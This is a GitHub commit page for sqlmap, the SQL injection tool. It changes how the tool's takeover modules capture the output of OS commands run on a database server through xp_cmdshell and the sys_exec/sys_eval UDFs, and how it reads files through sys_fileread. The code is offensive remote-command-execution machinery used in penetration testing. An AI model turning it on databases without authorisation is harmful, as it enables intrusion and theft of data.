Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 121148f

Browse files
bdamelebdamele
committed
There was no point relying on a support table (sqlmapoutput) to get the stdout of executed OS commands when using direct connection (-d) and it saves also number of requests.
Also, BULK INSERT apparently does not work on MSSQL when running as Network Service (at least on Windows XP) so one more reason to avoid using support table. Minor fix also to threat MSSQL's EXEC statements as SELECT ones
1 parent ebd40b3 commit 121148f

4 files changed

Lines changed: 54 additions & 22 deletions

File tree

lib/request/direct.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -47,7 +47,7 @@ def direct(query, content=True):
4747
logger.log(9, query)
4848

4949
start = time.time()
50-
if not select:
50+
if not select and "EXEC " not in query:
5151
_ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
5252
elif conf.hostname in kb.resumedQueries and query in kb.resumedQueries[conf.hostname] and "sqlmapoutput" not in query and "sqlmapfile" not in query:
5353
try:

lib/takeover/udf.py

Lines changed: 28 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -76,32 +76,50 @@ def udfCreateSupportTbl(self, dataType):
7676

7777
self.createSupportTbl(self.cmdTblName, self.tblField, dataType)
7878

79+
def udfForgeCmd(self, cmd):
80+
if not cmd.startswith("'"):
81+
cmd = "'%s" % cmd
82+
83+
if not cmd.endswith("'"):
84+
cmd = "%s'" % cmd
85+
86+
return cmd
87+
7988
def udfExecCmd(self, cmd, silent=False, udfName=None):
8089
if udfName is None:
81-
cmd = "'%s'" % cmd
8290
udfName = "sys_exec"
8391

84-
cmd = unescaper.unescape(cmd)
92+
cmd = unescaper.unescape(self.udfForgeCmd(cmd))
8593

86-
inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
94+
return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
8795

8896
def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
8997
if udfName is None:
90-
cmd = "'%s'" % cmd
9198
udfName = "sys_eval"
9299

93-
cmd = unescaper.unescape(cmd)
100+
if conf.direct:
101+
output = self.udfExecCmd(cmd, udfName=udfName)
102+
103+
if output and isinstance(output, (list, tuple)):
104+
new_output = ""
105+
106+
for line in output:
107+
new_output += line.replace("\r", "\n")
94108

95-
inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
96-
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
97-
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
109+
output = new_output
110+
else:
111+
cmd = unescaper.unescape(self.udfForgeCmd(cmd))
98112

99-
if output and isinstance(output, (list, tuple)):
100-
output = output[0]
113+
inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
114+
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)
115+
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
101116

102117
if output and isinstance(output, (list, tuple)):
103118
output = output[0]
104119

120+
if output and isinstance(output, (list, tuple)):
121+
output = output[0]
122+
105123
return output
106124

107125
def udfCheckNeeded(self):

lib/takeover/xp_cmdshell.py

Lines changed: 24 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -107,29 +107,43 @@ def xpCmdshellForgeCmd(self, cmd):
107107

108108
def xpCmdshellExecCmd(self, cmd, silent=False):
109109
cmd = self.xpCmdshellForgeCmd(cmd)
110-
inject.goStacked(cmd, silent)
110+
return inject.goStacked(cmd, silent)
111111

112112
def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
113113
self.getRemoteTempPath()
114114

115-
tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
116-
cmd = "%s > \"%s\"" % (cmd, tmpFile)
115+
if conf.direct:
116+
output = self.xpCmdshellExecCmd(cmd)
117117

118-
self.xpCmdshellExecCmd(cmd)
118+
if output and isinstance(output, (list, tuple)):
119+
new_output = ""
120+
121+
for line in output:
122+
if line == "NULL":
123+
new_output += "\n"
124+
else:
125+
new_output += "%s\n" % line.strip("\r")
119126

120-
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
127+
output = new_output
128+
else:
129+
tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
130+
cmd = "%s > \"%s\"" % (cmd, tmpFile)
131+
132+
self.xpCmdshellExecCmd(cmd)
121133

122-
self.delRemoteFile(tmpFile)
134+
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10)))
123135

124-
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, unique=False, firstChar=first, lastChar=last, safeCharEncode=False)
125-
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
136+
self.delRemoteFile(tmpFile)
126137

127-
if output and isinstance(output, (list, tuple)):
128-
output = output[0]
138+
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, unique=False, firstChar=first, lastChar=last, safeCharEncode=False)
139+
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
129140

130141
if output and isinstance(output, (list, tuple)):
131142
output = output[0]
132143

144+
if output and isinstance(output, (list, tuple)):
145+
output = output[0]
146+
133147
return output
134148

135149
def xpCmdshellInit(self):

plugins/dbms/postgresql/filesystem.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -34,7 +34,7 @@ def stackedReadFile(self, rFile):
3434

3535
self.initEnv()
3636

37-
return self.udfEvalCmd(cmd="'%s'" % rFile, udfName="sys_fileread")
37+
return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread")
3838

3939
def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
4040
errMsg = "PostgreSQL does not support file upload with UNION "

0 commit comments

Comments
 (0)